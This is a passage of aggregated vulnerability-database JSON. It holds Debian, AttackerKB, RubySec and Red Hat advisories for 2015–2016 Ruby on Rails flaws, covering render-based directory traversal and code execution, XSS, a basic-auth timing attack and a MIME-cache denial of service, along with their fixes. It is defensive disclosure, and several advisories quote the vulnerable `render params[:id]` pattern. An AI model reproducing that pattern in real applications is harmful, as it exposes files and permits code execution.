"2023-03-26T06:09:35", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-04-07T23:59:00", "type": "debiancve", "title": "CVE-2016-2097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-04-07T23:59:00", "id": "DEBIANCVE:CVE-2016-2097", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2097", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-26T06:09:35", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails 3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow remote attackers to inject arbitrary web script or HTML via text declared as \"HTML safe\" and used as attribute values in tag handlers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-09-07T19:28:00", "type": "debiancve", "title": "CVE-2016-6316", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-09-07T19:28:00", "id": "DEBIANCVE:CVE-2016-6316", "href": "https://security-tracker.debian.org/tracker/CVE-2016-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-26T06:09:35", "description": "The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-02-16T02:59:00", "type": "debiancve", "title": "CVE-2015-7576", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2016-02-16T02:59:00", "id": "DEBIANCVE:CVE-2015-7576", "href": "https://security-tracker.debian.org/tracker/CVE-2015-7576", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-26T06:09:35", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-04-07T23:59:00", "type": "debiancve", "title": "CVE-2016-2098", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-04-07T23:59:00", "id": "DEBIANCVE:CVE-2016-2098", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2098", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-26T06:09:35", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T02:59:00", "type": "debiancve", "title": "CVE-2016-0751", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2016-02-16T02:59:00", "id": "DEBIANCVE:CVE-2016-0751", "href": "https://security-tracker.debian.org/tracker/CVE-2016-0751", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-26T06:09:35", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T02:59:00", "type": "debiancve", "title": "CVE-2016-0752", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-16T02:59:00", "id": "DEBIANCVE:CVE-2016-0752", "href": "https://security-tracker.debian.org/tracker/CVE-2016-0752", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2023-03-22T23:12:12", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application\u2019s unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-07T00:00:00", "type": "attackerkb", "title": "CVE-2016-2097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2020-06-05T00:00:00", "id": "AKB:2DE37106-01B7-46BE-8BCC-B5F819F9225D", "href": "https://attackerkb.com/topics/97etM6Bw4W/cve-2016-2097", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-14T05:12:13", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application\u2019s unrestricted use of the render method and providing a .. (dot dot) in a pathname.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T00:00:00", "type": "attackerkb", "title": "CVE-2016-0752", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2020-07-30T00:00:00", "id": "AKB:4EA397A4-8D97-487F-A877-0376D1F51826", "href": "https://attackerkb.com/topics/60MM1Ug8Pn/cve-2016-0752", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "rubygems": [{"lastseen": "2022-10-25T12:12:52", "description": "\nThere is a possible directory traversal and information leak vulnerability\nin Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2\npatch was not covering all the scenarios. This vulnerability has been\nassigned the CVE identifier CVE-2016-2097.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x\nNot affected: 4.2+\nFixed Versions: 3.2.22.2, 4.1.14.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches\nfor it. It is in git-am format and consist of a single changeset.\n\n* 3-2-render_data_leak_2.patch - Patch for 3.2 series\n* 4-1-render_data_leak_2.patch - Patch for 4.1 series\n\nCredits\n-------\nThanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this\nand working with us in the patch!\n", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "rubygems", "title": "Possible Information Leak Vulnerability in Action View", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-2097", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-02-29T00:00:00", "id": "RUBY:ACTIONVIEW-2016-2097", "href": "https://rubysec.com/advisories/2016-2097/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "\nThere is a possible directory traversal and information leak vulnerability\nin Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2\npatch was not covering all the scenarios. This vulnerability has been\nassigned the CVE identifier CVE-2016-2097.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x\nNot affected: 4.2+\nFixed Versions: 3.2.22.2, 4.1.14.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches\nfor it. It is in git-am format and consist of a single changeset.\n\n* 3-2-render_data_leak_2.patch - Patch for 3.2 series\n* 4-1-render_data_leak_2.patch - Patch for 4.1 series\n\nCredits\n-------\nThanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this\nand working with us in the patch!\n", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "rubygems", "title": "Possible Information Leak Vulnerability in Action View", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-2097", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-02-29T00:00:00", "id": "RUBY:ACTIONPACK-2016-2097", "href": "https://rubysec.com/advisories/2016-2097/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a timing attack vulnerability in the basic authentication support\nin Action Controller. This vulnerability has been assigned the CVE\nidentifier CVE-2015-7576.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nDue to the way that Action Controller compares user names and passwords in\nbasic authentication authorization code, it is possible for an attacker to\nanalyze the time taken by a response and intuit the password.\n\nFor example, this string comparison:\n\n \"foo\" == \"bar\"\n\nis possibly faster than this comparison:\n\n \"foo\" == \"fo1\"\n\nAttackers can use this information to attempt to guess the username and\npassword used in the basic authentication system.\n\nYou can tell you application is vulnerable to this attack by looking for\n`http_basic_authenticate_with` method calls in your application.\n\nAll users running an affected release should either upgrade or use one of\nthe workarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nIf you can't upgrade, please use the following monkey patch in an initializer\nthat is loaded before your application:\n\n```\n$ cat config/initializers/basic_auth_fix.rb\nmodule ActiveSupport\n module SecurityUtils\n def secure_compare(a, b)\n return false unless a.bytesize == b.bytesize\n\n l = a.unpack \"C#{a.bytesize}\"\n\n res = 0\n b.each_byte { |byte| res |= byte ^ l.shift }\n res == 0\n end\n module_function :secure_compare\n\n def variable_size_secure_compare(a, b)\n secure_compare(::Digest::SHA256.hexdigest(a), ::Digest::SHA256.hexdigest(b))\n end\n module_function :variable_size_secure_compare\n end\nend\n\nmodule ActionController\n class Base\n def self.http_basic_authenticate_with(options = {})\n before_action(options.except(:name, :password, :realm)) do\n authenticate_or_request_with_http_basic(options[:realm] || \"Application\") do |name, password|\n # This comparison uses & so that it doesn't short circuit and\n # uses `variable_size_secure_compare` so that length information\n # isn't leaked.\n ActiveSupport::SecurityUtils.variable_size_secure_compare(name, options[:name]) &\n ActiveSupport::SecurityUtils.variable_size_secure_compare(password, options[:password])\n end\n end\n end\n end\nend\n```\n\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 4-1-basic_auth.patch - Patch for 4.1 series\n* 4-2-basic_auth.patch - Patch for 4.2 series\n* 5-0-basic_auth.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\n\nThank you to Daniel Waterworth for reporting the problem and working with us to\nfix it.\n", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "rubygems", "title": "Timing attack vulnerability in basic authentication in Action Controller.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2015-7576", "CVE-2015-7576"], "modified": "2016-01-25T00:00:00", "id": "RUBY:ACTIONPACK-2015-7576", "href": "https://rubysec.com/advisories/2015-7576/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a possible remote code execution vulnerability in Action Pack.\nThis vulnerability has been assigned the CVE identifier CVE-2016-2098.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x, 4.2.x\nNot affected: 5.0+\nFixed Versions: 3.2.22.2, 4.1.14.2, 4.2.5.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller or a view may be vulnerable to a code injection.\n\nImpacted code will look like this:\n\n```ruby\nclass TestController < ApplicationController\n def show\n render params[:id]\n end\nend\n```\n\nAn attacker could use the request parameters to coerce the above example\nto execute arbitrary ruby code.\n\nAll users running an affected release should either upgrade or use one of\nthe workarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided a\npatch for it. It is in git-am format and consist of a single changeset.\n\n* 3-2-secure_inline_with_params.patch - Patch for 3.2 series\n* 4-1-secure_inline_with_params.patch - Patch for 4.1 series\n* 4-2-secure_inline_with_params.patch - Patch for 4.2 series\n\nCredits\n-------\nThanks to both Tobias Kraze from makandra and joernchen of Phenoelit for\nreporting this!\n", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "rubygems", "title": "Possible remote code execution vulnerability in Action Pack", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-2098", "CVE-2016-2098"], "modified": "2016-02-29T00:00:00", "id": "RUBY:ACTIONPACK-2016-2098", "href": "https://rubysec.com/advisories/2016-2098/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a possible object leak which can lead to a denial of service\nvulnerability in Action Pack. This vulnerability has been\nassigned the CVE identifier CVE-2016-0751.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nA carefully crafted accept header can cause a global cache of mime types to\ngrow indefinitely which can lead to a possible denial of service attack in\nAction Pack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nThis attack can be mitigated by a proxy that only allows known mime types in\nthe Accept header.\n\nPlacing the following code in an initializer will also mitigate the issue:\n\n```ruby\nrequire 'action_dispatch/http/mime_type'\n\nMime.const_set :LOOKUP, Hash.new { |h,k|\n Mime::Type.new(k) unless k.blank?\n}\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 5-0-mime_types_leak.patch - Patch for 5.0 series\n* 4-2-mime_types_leak.patch - Patch for 4.2 series\n* 4-1-mime_types_leak.patch - Patch for 4.1 series\n* 3-2-mime_types_leak.patch - Patch for 3.2 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\nAaron Patterson <3<3\n", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "rubygems", "title": "Possible Object Leak and Denial of Service attack in Action Pack", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-0751", "CVE-2016-0751"], "modified": "2016-01-25T00:00:00", "id": "RUBY:ACTIONPACK-2016-0751", "href": "https://rubysec.com/advisories/2016-0751/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a possible directory traversal and information leak vulnerability in\nAction View. This vulnerability has been assigned the CVE identifier\nCVE-2016-0752.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 3-2-render_data_leak.patch - Patch for 3.2 series\n* 4-1-render_data_leak.patch - Patch for 4.1 series\n* 4-2-render_data_leak.patch - Patch for 4.2 series\n* 5-0-render_data_leak.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\nThanks John Poulin for reporting this!\n", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "rubygems", "title": "Possible Information Leak Vulnerability in Action View", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-0752", "CVE-2016-0752"], "modified": "2016-01-25T00:00:00", "id": "RUBY:ACTIONVIEW-2016-0752", "href": "https://rubysec.com/advisories/2016-0752/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a possible directory traversal and information leak vulnerability in\nAction View. This vulnerability has been assigned the CVE identifier\nCVE-2016-0752.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 3-2-render_data_leak.patch - Patch for 3.2 series\n* 4-1-render_data_leak.patch - Patch for 4.1 series\n* 4-2-render_data_leak.patch - Patch for 4.2 series\n* 5-0-render_data_leak.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\nThanks John Poulin for reporting this!\n", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "rubygems", "title": "Possible Information Leak Vulnerability in Action View", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-0752", "CVE-2016-0752"], "modified": "2016-01-25T00:00:00", "id": "RUBY:ACTIONPACK-2016-0752", "href": "https://rubysec.com/advisories/2016-0752/", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2021-11-09T01:51:33", "description": "It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-12T06:18:33", "type": "redhatcve", "title": "CVE-2016-6316", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, 